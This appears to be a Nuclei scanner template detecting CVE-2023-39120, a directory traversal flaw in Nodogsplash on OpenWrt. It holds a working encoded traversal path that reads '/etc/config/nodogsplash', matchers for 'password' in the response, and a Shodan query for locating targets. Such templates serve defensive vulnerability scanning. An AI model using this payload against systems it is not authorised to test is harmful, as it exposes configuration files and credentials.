48 lines
1.4 KiB
YAML
48 lines
1.4 KiB
YAML
id: CVE-2023-39120
|
|
|
|
info:
|
|
name: Nodogsplash - Directory Traversal
|
|
author: Numan Türle
|
|
severity: high
|
|
description: |
|
|
Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39120
|
|
- https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed
|
|
- https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6
|
|
- https://github.com/openwrt/routing/pull/997
|
|
remediation: Apply all relevant security patches and product upgrades.
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-39120
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"OpenWRT"
|
|
tags: cve,cve2023,lfi,openwrt,nodogsplash
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "nodogsplash"
|
|
- "password"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|